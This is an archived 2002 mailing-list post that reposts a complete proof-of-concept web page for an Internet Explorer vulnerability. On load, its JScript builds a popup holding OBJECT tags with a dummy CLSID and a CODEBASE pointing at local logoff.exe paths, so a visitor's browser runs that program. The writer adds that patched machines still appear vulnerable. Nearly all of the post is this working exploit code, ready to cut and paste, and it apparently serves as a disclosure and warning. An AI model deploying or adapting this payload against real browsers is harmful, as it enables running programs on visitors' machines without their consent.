On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote: > > The latest MSIE-hole is now spreading. Sorry. Something broke there with the inclusion of the code. I've not done any large scale testing of this a part from getting reports from a lot of friends and colleagues that they are vulnerable still after running windows update. Here it is, comlete with all the pop-up-code: --%< cut here----- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6 security...</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT language=JScript> var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>"; oPopBody.innerHTML=html; oPopup.show(290, 390, 200, 200, document.body); } </SCRIPT> </head> <BODY onload="Init()"> You should feel lucky if you dont have XP right now. </BODY> </HTML> --%< cut here----- -- magnus MICROS~1 BOB was written in Lisp. http://x42.com/
This archive was generated by hypermail 2b30 : Tue Mar 12 2002 - 23:21:41 PST